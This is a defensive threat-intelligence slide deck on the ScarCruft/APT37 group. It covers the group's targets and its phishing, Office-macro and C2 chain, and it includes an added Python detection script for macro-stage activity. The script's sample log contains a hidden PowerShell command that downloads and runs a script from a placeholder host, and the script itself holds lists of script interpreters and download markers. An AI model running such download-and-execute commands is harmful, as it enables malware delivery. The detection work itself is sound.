ScarCruft Group Threat Tracking and Defend Forward
AGENDA
Who are we?
What is ScarCruft?
Threat Tracking
Defend Forward
Who are we?
Profound Analysis Team
Identify and respond to threats by analyzing cyber incidents, in order to minimize and prevent the damage they cause
Who are we?
Threat Hunting Life cycle
Yara Rule
VirusTotal
Sigma Rule
Intelligence
Report
Result
Hunting
HUMINT
Triage of high-risk incidents for focused analysis
Incident Response
FENS
Malware
Sandbox
Analyzing (Analyst)
Analyzing (system)
Network
What is ScarCruft?
aka:
APT 37, Group123
Ricochet Chollima, Venus121
Target:
Journalists
North Korean defectors
Government Officials
malpedia.caad.fkie.fraunhofer.de/actor/apt37
What is ScarCruft?
21.11 ~
ScarCruft Group
Threat Tracking & Defend Forward
Known TTPs
’21 ~ ’22 Q2
Phishing mail
→ E-mail attachment link click & download Office document (compromise host A)
→ Load Office macro script; decoy document shown (compromise host B)
→ Download malicious script (>_)
→ Command & Control (compromise host C): Chinotto
→ Information collection & exfiltration
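The chain above turns on one observable pivot: an Office process, launched from the phished attachment, spawning a script interpreter that fetches the next stage. The following is an added example, not part of the original deck or the team's own tooling, of a minimal Sigma-style hunt for that stage run over constructed process-creation records. The log format (quoted key=value fields), the host names, the URL compromised-host-b.example and the process/command-line values are all assumptions made up for the example.

```python
"""
Added example (not from the original deck): flag the macro stage of the
ScarCruft chain, i.e. an Office parent process spawning a script
interpreter or downloading content. All sample records below are
constructed; the log format and values are assumptions for illustration.
"""
import re
from dataclasses import dataclass

# Office parents and the script/LOLBin children seen in macro-driven chains.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                   "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Substrings that indicate the child is pulling a next stage from a remote host.
DOWNLOAD_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
                    "invoke-webrequest", "bitsadmin", "certutil")


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Assumed log layout: key="value" pairs; quoting lets paths contain spaces.
_KV = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> ProcessEvent:
    fields = dict(_KV.findall(line))
    return ProcessEvent(fields["host"], fields["parent"], fields["image"], fields["cmd"])


def basename(path: str) -> str:
    """Lower-cased final path component of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list:
    """Return the names of the detection rules that fire for one event."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line.lower()
    hits = []
    # Rule 1: Office document spawning a script interpreter (macro stage).
    if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
        hits.append("office_spawns_script_interpreter")
    # Rule 2: the Office child reaches out to fetch a next stage (host B stage).
    if parent in OFFICE_PARENTS and any(m in cmd for m in DOWNLOAD_MARKERS):
        hits.append("office_child_downloads_content")
    return hits


def hunt(lines) -> dict:
    """Map each host to the sorted list of rules that fired on it."""
    findings = {}
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in classify(ev):
            findings.setdefault(ev.host, set()).add(rule)
    return {host: sorted(rules) for host, rules in findings.items()}


# Constructed sample records (not real telemetry). ws01 and ws02 model the
# macro stage; the other two lines are benign noise that must not fire.
SAMPLE_LOG = r'''
host="ws01" parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\wscript.exe" cmd="wscript.exe //e:vbscript C:\Users\u\AppData\Local\Temp\a.txt"
host="ws01" parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmd="notepad.exe memo.txt"
host="ws02" parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://compromised-host-b.example/s.txt')"
host="ws03" parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe Get-Date"
'''


if __name__ == "__main__":
    for host, rules in hunt(SAMPLE_LOG.splitlines()).items():
        print(host, rules)
```

Rule 1 alone catches the common case; rule 2 is the one that survives when the attacker swaps the interpreter, since the download to the staging host is what the chain cannot avoid. In a real deployment the two rules map directly onto Sigma `process_creation` selections on ParentImage, Image and CommandLine.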
Known …
Defend Forward